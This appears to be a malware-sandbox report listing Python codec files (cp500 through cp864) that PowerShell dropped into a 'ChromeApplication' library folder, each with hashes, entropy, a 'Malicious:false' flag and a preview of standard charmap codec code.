                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp500 generated from 'MAPPINGS/VENDORS/MICSFT/EBCDIC/CP500.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp500',.. e

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp720.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13995
                                                                                                                                                                                                  Entropy (8bit):4.642939154809849
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:fhsuOTDvRD9lPEeXGyQCmEdfn4OH3NGzN7KwAKYWEDdunzT:STSeXGy1dc5
                                                                                                                                                                                                  MD5:9B7E8AB7C2EE4F82BE09E14F3D3AEA4C
                                                                                                                                                                                                  SHA1:AA76BF3210EF70474330E0212A8B2EDEB518DC5B
                                                                                                                                                                                                  SHA-256:016BDB7208A0D6BFAF8972C1F6BB4B3DE39C77E026B49ED106866D592BE4810B
                                                                                                                                                                                                  SHA-512:0E706CB3E9199663D2DE2E6443F2C9E46279F11ED32BFFE482C4262D7CBD1A30F49018588F96C037E147D9DCE27F29C4ABC1EAAD230CF09B73317F5872967CCD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Python Character Mapping Codec cp720 generated on Windows:..Vista 6.0.6002 SP2 Multiprocessor Free with the command:.. python Tools/unicode/genwincodec.py 720.."""#"......import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codec

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp737.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):35379
                                                                                                                                                                                                  Entropy (8bit):4.616163070442315
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:VmDXpX8Jytkjh4wVoEm3clxHRE8q6HWJn4AVhUise69/TUMy:8DXizjhJVoEm3clx6y2BFH25W
                                                                                                                                                                                                  MD5:BD60E98CC59C8BD60874F59A06E30F78
                                                                                                                                                                                                  SHA1:D0086209BA6B3D56964EA7295A8EA54BC5AA02D7
                                                                                                                                                                                                  SHA-256:F2DA9D418B2364C2E1A587B7A6E26FF5601C16AA7993070F2C955DDF2A1F860D
                                                                                                                                                                                                  SHA-512:377D0F87DDBB23D9CCAABE35085EF1E92FCE766B01E55774F4371EA281A03825D141A6F905C90C419B19D09529A8185827C9F4FC6EB176BBADE3DFB478AFB1A0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp737 generated from 'VENDORS/MICSFT/PC/CP737.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp737',.. encode=Codec().enc

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp775.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):35173
                                                                                                                                                                                                  Entropy (8bit):4.550355257462109
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:8HLsuYDvRxp2YM0AQ7COJgJOlSwrE0PXRN/h4wcuSMy+PeD3xUpWS2449jBRWJnI:lRNALMSkjh4wVHeahcHWJn4AVztzXsj5
                                                                                                                                                                                                  MD5:CBEF285952C0476BF35BFCD7E7818919
                                                                                                                                                                                                  SHA1:1C61953A3AE6638EE415CA2A93710FF3D8E59D68
                                                                                                                                                                                                  SHA-256:00F2A5E71CA98ED656EC430A80FC2E971988A0A33EBDEA77661BDBE24FE2FBFF
                                                                                                                                                                                                  SHA-512:2F78E73843365DB7F164C2F3C7CD2AE5860D80A11BAF9212BA54C58F9B08C99035FEF6A200D836036AF2B4F1F286B0C2447953203B0EB1C87FD5F1DBE3D24396
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp775 generated from 'VENDORS/MICSFT/PC/CP775.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp775',.. encode=Codec().enc

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp850.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34803
                                                                                                                                                                                                  Entropy (8bit):4.521332806052938
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:QHLsuYDvRVSUpAJZjJBfX6l6xSwrE0PXRN/h4wcuSM5kw9evMStmxspGf6w6F44j:hbAZSkjh4wV5j9eJTHWJn4AVgqur
                                                                                                                                                                                                  MD5:F5F11DA44C65B2A394A4137E36E35E82
                                                                                                                                                                                                  SHA1:BD17C2F9156D704AEAB144A4C1B5B8CA436A5D73
                                                                                                                                                                                                  SHA-256:DCBE5938D7FE65072D4A286A184046DB211544C30F0C3C370B9CD594CF3B36BD
                                                                                                                                                                                                  SHA-512:58AE94059D5ABDC1892FE28DA1646249A0A96817B790BA468B1AA11983A8292AB1FCD1357C9EF9771DE11685FC999791DB184CAF16E7E05D634680AF8A74D6BA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP850.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp850',.. encode=Codec().encode,..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp852.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):35700
                                                                                                                                                                                                  Entropy (8bit):4.529290225811869
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:SHLsuYDvRzgbY6oxCzhnfnh7gwrE0PXRN/h4wcuSMyLLUhmCIbp0w449jBRWJn4d:vgCkjh4wVy/xHWJn4AV9dQr
                                                                                                                                                                                                  MD5:BB2BA9443AE7BD887BA8EAC3E622366A
                                                                                                                                                                                                  SHA1:777E47CA86C4CF65DA68603DDACD6C78B89E0DC7
                                                                                                                                                                                                  SHA-256:8B6AD769607B3DB0D60E4BA1A6321A3823AD8460890D48C816220DCDF8CBEA98
                                                                                                                                                                                                  SHA-512:EBAEC3C9AB014DD4B9629DF511D5E98A9CC88F4035841756142AFC462AB00D07B92050F62C89CF7B2C4891E7D4165F3B3C78548062AACE86E4680C6E2FF3F996
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP852.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp852',.. encode=Codec().encode,..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp855.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34548
                                                                                                                                                                                                  Entropy (8bit):4.55461632698867
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:PHLsuYDvR+mIj30FeMwrE0PXRN/h4wcuSM2fi+ypK2449jBRWJn4bkVd8nOiB6HL:i+0rkjh4wV8iN3HWJn4AVd8n0r
                                                                                                                                                                                                  MD5:7C84762C6FD5251CD237754FEB1752D4
                                                                                                                                                                                                  SHA1:B4F083D0AC32E26B77DB2E99F53C079DB7B844A1
                                                                                                                                                                                                  SHA-256:F4F47A5CF3FE5A8CD269B68A73C1DC293A75CD3B9C0489CFA600919B47B35A4C
                                                                                                                                                                                                  SHA-512:D841B04E354ADD8C3D337A6952163CDC8D74FE8F561418A8DEA9C7C5986EE15179F9F5B2336880ABD279CE45AA46CB55020EDE9CDF0FE8B7EA093D1033B5F108
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP855.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp855',.. encode=Codec().encode,..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp856.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12730
                                                                                                                                                                                                  Entropy (8bit):4.6600353742865055
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:JgHhsuOTDvRPUrXPLouhIAs2+i+/4mwNLlYip2MUo8ONT:jT5uhIAlg02MH
                                                                                                                                                                                                  MD5:EE5A43420B08D06B0B2D72A49F00216D
                                                                                                                                                                                                  SHA1:5CAB8D55CB2910C092AF40C921E0B0959933C216
                                                                                                                                                                                                  SHA-256:F0C9DAC1B08D688B81B4F11CA603336FBD5C7FC4C1A30E8B7836283C2AD9A8E7
                                                                                                                                                                                                  SHA-512:97CC6127C21CF49679AD8AC1B47D22D674A07D83BDCD7FAB54B3C821F8DC531435F3B12EE63222C92E3A9D6895404BA857926BA2CA52CDB1BD3ED51B49009C65
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp856 generated from 'MAPPINGS/VENDORS/MISC/CP856.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp856',.. encode=Cod

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp857.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34602
                                                                                                                                                                                                  Entropy (8bit):4.528500526287676
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:BHLsuYDvR8LmUdMAJZjy5xSwrE0PXRN/h4wcuSMMksbYevMScnepGW449jBRWJn+:4FAcSkjh4wVMuecebHWJn4AVk2Yr
                                                                                                                                                                                                  MD5:DD1F84F2921D49CF944DF4BCF6ECF7E8
                                                                                                                                                                                                  SHA1:7EEE7B6CAA8120C4D26E96FCCC21C4474BD2652A
                                                                                                                                                                                                  SHA-256:8AE4CB6989342105C513678480ECBDF2D5D8E534E69704964D0FB4D2A960039B
                                                                                                                                                                                                  SHA-512:92DB4E13E84876B51B2600F503C56857E96F06A1F23C327762372F97628C766B0E524568672FBF3BA07B26A4284C1AEB522BD433F3ABB9704CF9277157B95832
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP857.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp857',.. encode=Codec().encode,..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp858.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34713
                                                                                                                                                                                                  Entropy (8bit):4.518245366498134
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:CLsuYDvR9SUpAJZjJBIX6l6xSwrE0PXRN/h4wcuSM5kw9evMStmxNpGf6w6F4490:3jAYSkjh4wV5j9e2THWJn4AVgq/r
                                                                                                                                                                                                  MD5:F0B8B1B55A90C1EA058759AD18834A75
                                                                                                                                                                                                  SHA1:FD7AFDDE40956991241D6130F72A40D1C655B15B
                                                                                                                                                                                                  SHA-256:04A67B43EFA1E0CE2D80791C290BC2C8EA01C3991EB3DF37528B1DD575B12330
                                                                                                                                                                                                  SHA-512:72F7905616B3B3F9D961E4A605B15A8B9D427E13A82B1BA9AC1F2380E961DE6848A9C5068A57DE6CF62E0CEC5D9E6C2D7310F906D0EC16CAC345E48AA1ABF352
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec for CP858, modified from cp850....."""....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp858',.. encode=Codec().encode,.. decode=Codec().decode,..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp860.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):35379
                                                                                                                                                                                                  Entropy (8bit):4.587856666654445
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:/HLsuYDvRGYj/bXdiaYzIUqwrE0PXRN/h4wcuSMBmkwNvuD8HtIMpWZEt449jBRq:SfnZkjh4wVMjNjxAEJHWJn4AVWIcOMy
                                                                                                                                                                                                  MD5:1F0B22586EC65A59C966A709024E35E4
                                                                                                                                                                                                  SHA1:143BCD55359AD3B9506D6583D04A8C1BF32366BD
                                                                                                                                                                                                  SHA-256:E2B8B4B2658ECC3DC53D4B0760AEA95517BE298FAFBFA69574B08933747922BE
                                                                                                                                                                                                  SHA-512:7859FBC58DD5B68614F3F83DA28AA600E86A6F2DB7E011870B212E4D721478A8028D893AB666212DA1B1D38D41BB9E03B985C555154E33A20D71D2449DE7FDF2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP860.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp860',.. encode=Codec().encode,..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp861.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):35331
                                                                                                                                                                                                  Entropy (8bit):4.588014438980019
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:FfLnZkjh4wVlPVjxAEJHWJn4AVPScqPMy:JqjhJVbxAEJ2BFDS
                                                                                                                                                                                                  MD5:83CFB87E2BB8A42739A03DA1D979AF6A
                                                                                                                                                                                                  SHA1:97C16F469B56F437F521C482C613D4AEC6EF3206
                                                                                                                                                                                                  SHA-256:D7FE52A55FDCAC4E6E9ECDC4884C793D1FEB345D0276B074214DB1BF4BCF3033
                                                                                                                                                                                                  SHA-512:589B6933A5E45176210EA18997B056F41A6B03D765668B7328577D5CF8EEC9CF55B6247E225835D4666EB2AA0714ED927902929B75E27711437612BF9463D89E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP861.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp861',.. encode=Codec().encode,..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp862.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34068
                                                                                                                                                                                                  Entropy (8bit):4.605627535144471
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:oPFL+DZkjh4wVOjIVjx79EJHWJn4AVE6AsqPMy:8UDqjhJVkKx79EJ2BFX7S
                                                                                                                                                                                                  MD5:D22ABCA28D2425D802F53021178224A1
                                                                                                                                                                                                  SHA1:D26E991DA020C07E58C03506347803A88230A6BB
                                                                                                                                                                                                  SHA-256:6D99C0415136CE45AB438C8238772A1A132E7B38212C623467C2170F1A8AAE75
                                                                                                                                                                                                  SHA-512:66E7C898ED749CF2706EA877FB099F50477EC5EA3C0FB4F2FA189F4E849D37AD01E7899BFC04A3D60D6CD5A1D42CFF69E71D0A39BE5F51C919543D22C2D82C6A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP862.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp862',.. encode=Codec().encode,..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp863.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34950
                                                                                                                                                                                                  Entropy (8bit):4.597040843450106
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:DQ6LHZkjh4wV5VvxAEJHWJn4AV7qmqPMy:VqjhJVjxAEJ2BFtS
                                                                                                                                                                                                  MD5:13279C9ED7C1F7AF8722F9EB3A1B595B
                                                                                                                                                                                                  SHA1:BCF042EA7D75E802EE940B3C979626DCD0FAAD33
                                                                                                                                                                                                  SHA-256:32FC23645A773EBB3247B3692D0525EA43513B358DD0350EF3A171864E326335
                                                                                                                                                                                                  SHA-512:95CDDCB21D1E738A6850BEA50F6ABD8BBC537F916AC1B3BC16449710EECCDD6B9A54A584A6E40F89E3068B601F43EB297214B1585C9F658B7901BE8F1CBB5162
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP863.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp863',.. encode=Codec().encode,..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp864.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34353
                                                                                                                                                                                                  Entropy (8bit):4.587380932355719
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:THLsuYDvRKLaH2bdfn8yrE0PXRQ/h4wcuSMurHUF3zZUB+yEsqj44HjBRWJn4bkg:On2quKh4wVU2HWJn4AVXwn
                                                                                                                                                                                                  MD5:30CBEC79DA2D6565A1C62EF240272223
                                                                                                                                                                                                  SHA1:00C4D427BBE2ADEC7FD3EB73C4F025523D352EA6
                                                                                                                                                                                                  SHA-256:E8879DB3682B0F234BFCF97FE74A3A7DB63CFD5F40281F580E911932DEC4A4D3
                                                                                                                                                                                                  SHA-512:69191F9A4D7089C74A5CA459D0A325BD21347AAC6CAA7F2D4DBE7835A73CD31CCD23C395B11ED91AB55C1592456C7D39A6F3D2CBF1CD2338A27B921A41435864
                                                                                                                                                                                                  Malicious:false
